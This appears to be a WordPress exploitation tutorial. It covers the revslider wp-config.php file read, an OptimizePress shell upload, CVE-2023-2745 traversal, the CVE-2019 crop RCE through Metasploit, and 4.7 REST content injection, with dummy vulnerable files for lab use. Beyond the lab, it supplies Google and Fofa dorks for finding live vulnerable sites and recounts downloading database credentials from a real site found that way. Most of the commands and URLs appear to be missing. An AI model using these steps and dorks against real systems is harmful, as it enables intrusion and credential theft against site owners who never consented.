Find The Right Exploit
π Vulnerable Plugins & Themes - Find the right exploit
Many WordPress vulnerabilities stem from outdated or misconfigured plugins and themes. Exploiting these can allow an attacker to gain remote code execution (RCE), privilege escalation, or sensitive information disclosure.
Step-by-Step Exploitation:
Enumerate Installed Plugins & Themes (Part II)
Check for Known Vulnerabilities
Cross-reference discovered plugins/themes with CVE databases:
GitHub PoCs - Security researchers and penetration testers often share proof-of-concept (PoC) exploits on GitHub.
CVE Details / NVD (National Vulnerability Database)
Google "[Plugin name] exploit" --> check if it is the right version.
Revslider Plugin Exploit Example
An example of a WordPress plugin exploit is from a vulnerability discovered 5 years ago. The vulnerable revslider plugin resulted in tens of thousands of compromised WordPress sites. To this day, there are attempts to exploit it in our web server logs, even in 2019. One reason it was such a popular plugin is that it was bundled with many themes.
A number of exploitation opportunities are possible, but this is perhaps the easiest to demonstrate. Exploitation is as difficult as loading this URL in a browser.
The HTTP request would download the wp-config.php file from the vulnerable site if it had the exploitable version of revslider installed. The exploit type is known as a local file include, as the attacker is tricking the application code into including a sensitive file in the output. The wp-config.php is not normally accessible and contains the database credentials for the WordPress database user.
With the database password, an attacker could attempt to login as the WordPress admin using the same password (if passwords were re-used). A more common attack vector would be to login to the phpmyadmin script if installed, as this uses the database credentials. If MySQL is exposed, it may even possible to directly connect to the database using a MySQL database client and the leaked credentials.
Access to the database provides the attacker options to reset the administrator password, attempt to crack the admin hash, modify content in the database, adding malicious js or iframes. There are many possibilities for further exploitation once the credentials in wp-config.php are leaked.
π₯ How to Install the Dummy Plugin
To demonstrate this behavior, download the Dummy RevSlider Lab plugin from this repository (ZIP file).
Log in to your WordPress Admin Dashboard.
In the left sidebar, click on Plugins β Add New.
At the top, click Upload Plugin.
Select the downloaded
.zipfile and upload it.
Once uploaded, click Activate Plugin.
β The plugin is now active and ready for lab use.
Exploitation:
Great! Now everything is set. If we browse to this URL, the plugin will automatically trigger a download of the wp-config.php file, exposing the database username and password.
Please note: You can replace ../../../wp-config.php with any file path on the server. If the file does not exist, the downloaded file will have a size of 0 bytes.
For example, if your WordPress installation is located at /var/www/html/wordpress, any file within this directory can be accessed using ../../../[filename].
If youβre unfamiliar with ../, it simply means βgo up one directory level.β By using enough ../ sequences, it is possible to traverse directories and potentially access files anywhere on the system.
Dork Google: revslider.php "index of"
Found WordPress site with this plugin:
Browse to this URL:
Config file was download with password and username!
OptimizePress Theme Example Exploit
The OptimizePress theme exploit you mentioned is a file upload vulnerability in media-upload.php:
Vulnerable versions: β€ 1.45 (released 2013)
Vulnerability type: unauthenticated or insufficiently protected file upload
Impact: An attacker can upload a malicious PHP file (shell) and execute arbitrary code on the server.
Why it works:
media-upload.phphandles file uploads, but the theme does not validate the file type properly.Attackers can bypass restrictions and upload
.phpscripts.Once uploaded, accessing the PHP file in a browser runs it on the server β full remote code execution (RCE).
Using Metasploit to find exploit:
Open Metasploit Framework
Search for the WordPress theme module
Select the module
Set target URL
Select a payload
Run the exploit
β Exploiting WordPress Core
Vulnerabilities in WordPress core crop up from time to time. While remote unauthenticated vulnerabilities are relatively rare, any attacker would do well to be familiar with the more exploitable vulnerabilities in WordPress Core.
CVE-2023-2745: Directory Traversal in WordPress Core β€6.2
Published: May 17, 2023 CVSS v3.1 Base Score: 6.1 (Medium) CWE Classification: CWE-22 β Improper Limitation of a Pathname to a Restricted Directory Affected Versions: WordPress Core β€ 6.2 Patched Version: WordPress 6.2.1
CVE-2023-2745 is a directory traversal vulnerability in WordPress Core that affects versions up to and including 6.2. The issue arises from improper sanitization of the wp_lang parameter, which is used to load translation files. An unauthenticated attacker can exploit this flaw to access and load arbitrary translation files from the server, potentially leading to unauthorized information disclosure or further exploitation.
Technical Details
Vulnerable Parameter:
wp_langExploit Mechanism: Directory traversal via
wp_langparameterPotential Impact:
Unauthorized access to arbitrary translation files
Potential information disclosure
In scenarios where an attacker can upload a crafted translation file (e.g., through an upload form), this vulnerability could be leveraged to perform Cross-Site Scripting (XSS) attacks.
π₯ How to Install the Dummy wp-login.php vulnerablity
To demonstrate this behavior, download the Dummy wp-login.php from this repository.
go to
/var/www/html/wordpress/(Just paste it in the terminalcd /var/www/html/wordpress/)Remove the old Version of
/wp-login.phpand paste the Version from GitHub.
Refresh your wordpress server by this command:
β The wp-login.php is now active and ready for lab use.
Lab Usage Options
Option 1 β Manual testing via browser
Open your browser and go to:
Replace
/etc/passwdwith any file in your system.
Option 2 β Automated testing with Python
Run your Python script from my Repo cve-2023-2745:
Please note: first argument is the URL to wp-login.php, and the second is the file you want to read.
Finding Targets:
Fofa dork: icon_hash="1198047028" && body="WordPress 6.2"
β You can change WordPress version to even lower version because WordPress Core β€ 6.2
Automated testing with Python
Run your Python script from my Repo cve-2023-2745:
Please note: first argument is the URL to wp-login.php, and the second is the file you want to read.
CVE-2019-8942 & CVE-2019-8943 - WordPress Core β€ 4.9.8
WordPress has a built-in image editing feature (wp_crop_image() and wp_create_image_subsizes()) which allows users to upload images and crop/scale them. This functionality touches both filesystem paths and PHP execution paths.
These vulnerabilities stem from:
CVE-2019-8942 β Path Traversal in Image Crop Function
CVE-2019-8943 β Local File Inclusion (LFI) in Image Size Handling
When chained together:
Path Traversal lets you trick WordPress into reading or writing files outside its intended
uploads/directory.Local File Inclusion (LFI) allows the attacker to load that file as executable PHP code.
The result β Arbitrary PHP code execution.
Why it happened?
WordPressβs image crop function does not sanitize file paths correctly.
Attackers can manipulate the
imgsrcparameter to include../../../../sequences (directory traversal).Cropped files can then be saved in unexpected locations.
Later, because of improper validation, these files may be included and executed via
require()orinclude()during thumbnail/metadata generation.
This is dangerous because:
An attacker with Author+ role (who can upload media) can upload a fake βimageβ (actually a PHP backdoor disguised as an image).
Using traversal, they move it into a location that WordPress executes as PHP.
Finally, they trigger LFI to make WordPress execute the payload β full RCE.
Exploitation with Metasploit (wp_crop_rce)
wp_crop_rce)Metasploit has a ready-made module:
Step 1. Module Setup
Step 2. Configure Payload
Step 3. Run Exploit
Unauthenticated Content Injection in WordPress 4.7.0 and 4.7.1
In this vulnerability from 2017 an attacker is able to inject content into a post using the wp-json API.
WordPress 4.7/4.7.1 - Remote unauthenticated content injection
π₯ How to Install the Dummy class-wp-rest-posts-controller.php vulnerablity
class-wp-rest-posts-controller.php vulnerablityTo demonstrate this behavior, download the Dummy class-wp-rest-posts-controller.php from this repository.
go to
/var/www/html/wordpress/wp-includes/rest-api/endpoints(Just paste it in the terminalcd /var/www/html/wordpress/wp-includes/rest-api/endpoints)Remove the old Version of
/var/www/html/wordpress/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.phpand paste the Version from GitHub.
Refresh your wordpress server by this command:
β
The class-wp-rest-posts-controller.php is now active and ready for lab use.
Lab Usage Options
Manual testing via CURL
Open your terminal and send POST request using CURL:
Lets Browse to our site and see the injection!
Fofa dork: icon_hash="1198047028" && body="WordPress 4.7"
π‘ Please note- itβs highly unlikely that real WordPress sites are still running versions 4.7.0 / 4.7.1. Most of the βtargetsβ you may encounter online are honeypots, intentionally set up to monitor and log malicious activity. These honeypots are not real production sitesβthey exist to help security teams identify suspicious requests and improve defenses.
Last updated